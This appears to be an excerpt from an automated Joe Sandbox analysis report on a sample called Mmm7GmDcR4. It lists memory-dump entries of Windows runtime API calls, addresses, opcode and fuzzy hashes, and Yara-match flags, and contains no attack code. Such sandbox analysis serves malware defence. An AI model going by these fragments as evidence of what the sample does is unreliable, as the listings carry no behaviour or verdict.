                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /
                                                                                                • API String ID: 0-2043925204
                                                                                                • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                • Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
                                                                                                • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                • Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                                                • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                • Instruction ID: f668a88d0272c8003cc27bbbb55aa5d59c32921090f4169ebb7172773da88a08
                                                                                                • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                • Instruction Fuzzy Hash: 96022D71E41129DFDF14CFA9C8806ADB7F2EF49314F2542AAD929E7344D731AA41CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                                                • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                                                APIs
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02132622
                                                                                                • PostQuitMessage.USER32(00000000), ref: 021327C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4264772764-0
                                                                                                • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                • Instruction ID: 44450f2ce7fa58349cab0ec73c95299d82fe7c65b9ab47f4a1e2bf12f06caa07
                                                                                                • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                • Instruction Fuzzy Hash: 91411E25964384A9E631FFA1FC45B2533B1FF64722F10652BD524CB2B2E3B28944C75E
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02166F11,?,?,00000008,?,?,0216F3D2,00000000), ref: 02167143
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction ID: 0c39219986ceae4a202a55c2cc7d12f85e55d8cb7c9171e9619a7eea0b2f65c6
                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction Fuzzy Hash: 30B14E31150608DFD719CF28C48AB69BBE1FF45368F258659E8A9CF2E5C335D9A2CB40
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162190
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0216219D
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0216B8F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2955987475-0
                                                                                                • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                • Instruction ID: a4fb363a7153612ec98a31b670c01d250acadd2c447ab06ab79f26f782695915
                                                                                                • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                • Instruction Fuzzy Hash: FE21C8725982169FDF249F24DC49BBE73ADEF04314F00417AED01E6140E7359A64CB50
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2955987475-0
                                                                                                • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                • Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
                                                                                                • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                • Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02160A0C,?,0216BC79,00000000,?,?,?), ref: 0216B596
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                • Instruction ID: 4887b89c9ab4881aa82eb4d639c8322ccc594cca42e4a57a9b188d54cb4e6062
                                                                                                • Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                • Instruction Fuzzy Hash: 3111253B2087015FDB189F38C8A56BEBB92FF80358B15452DEA4697B40E771AA12CB40
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                • Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
                                                                                                • Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                • Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0216B86A,00000000,00000000,?), ref: 0216BAF8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                • String ID:
                                                                                                • API String ID: 787680540-0
                                                                                                • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                • Instruction ID: 69fc4175e8232bd11c9dc42b442d8a0c76881450cb0d73cb1707f55d28ae12dc
                                                                                                • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                • Instruction Fuzzy Hash: 68F0D132A88116ABDB389A24880DBBE7768EB4071CF054429EC46F3144EB70AE62C6D0
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162190
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0216219D
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0216B8F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2955987475-0
                                                                                                • Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                • Instruction ID: 420b122e368456cdefb05b8ea574942c7b2ab16c3cf03d556087237ca8001f87
                                                                                                • Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                • Instruction Fuzzy Hash: 2B012632B892159BCB14AF34DC88ABE33A9DF05710F0041BAEF02EB281DB359E11CB50
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                • String ID:
                                                                                                • API String ID: 787680540-0
                                                                                                • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                                                • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02160A0C,?,0216BC3D,02160A0C,?,?,?,?,?,02160A0C,?,?), ref: 0216B60B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                • Instruction ID: a5a0748f689634462e0d7ab53299914207d39bef4c9fb4e5084534dd49a1105a
                                                                                                • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                • Instruction Fuzzy Hash: 06F022363043041FDB145F398C94B7E7B92EF8032CF14442CFA06CB680D77199028B44
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                                                • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0216046A,?,00000004), ref: 0216546A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                • Instruction ID: 709ed6b872981538ebbb526e80ece0b9d7df66603f821b5573d04422b123780f
                                                                                                • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                • Instruction Fuzzy Hash: 8DF0F031A80318BFDB01AF60DC09FBE7B22EF04B12F504055FD0566290DB728A30EA8A
                                                                                                APIs
                                                                                                  • Part of subcall function 0215E644: RtlEnterCriticalSection.NTDLL(01CE0DA5), ref: 0215E653
                                                                                                • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0216505C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                • Instruction ID: 41c2082e3f8796a0771dceb4f77e55817a7e617a6749b546041ff22cffd2dd13
                                                                                                • Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                • Instruction Fuzzy Hash: 42F08C32A50300EFEB04EF68D805B4C37F1AB05711F104166FA14DB2A1CB7999408F49
                                                                                                APIs
                                                                                                  • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
                                                                                                • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                • Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
                                                                                                • Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                • Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49
                                                                                                APIs
                                                                                                  • Part of subcall function 02162131: GetLastError.KERNEL32(?,?,0215A9DC,?,00000000,?,0215CDD6,02132474,00000000,?,00451F20), ref: 02162135
                                                                                                  • Part of subcall function 02162131: _free.LIBCMT ref: 02162168
                                                                                                  • Part of subcall function 02162131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621A9
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0216BC9B,02160A0C,?,?,?,?,?,02160A0C,?,?,?), ref: 0216B510
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                • Instruction ID: cc73e2178c4760c3d5463bfa8952499802580349b344d29ddb7fbda07ebe5f7c
                                                                                                • Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                • Instruction Fuzzy Hash: F7F0203A34020457CB149F35E81877ABF90EF81754B0A4059EF05CB240C3319942C790
                                                                                                APIs
                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                • Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
                                                                                                • Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                • Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00410662,0213FE56), ref: 021408C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
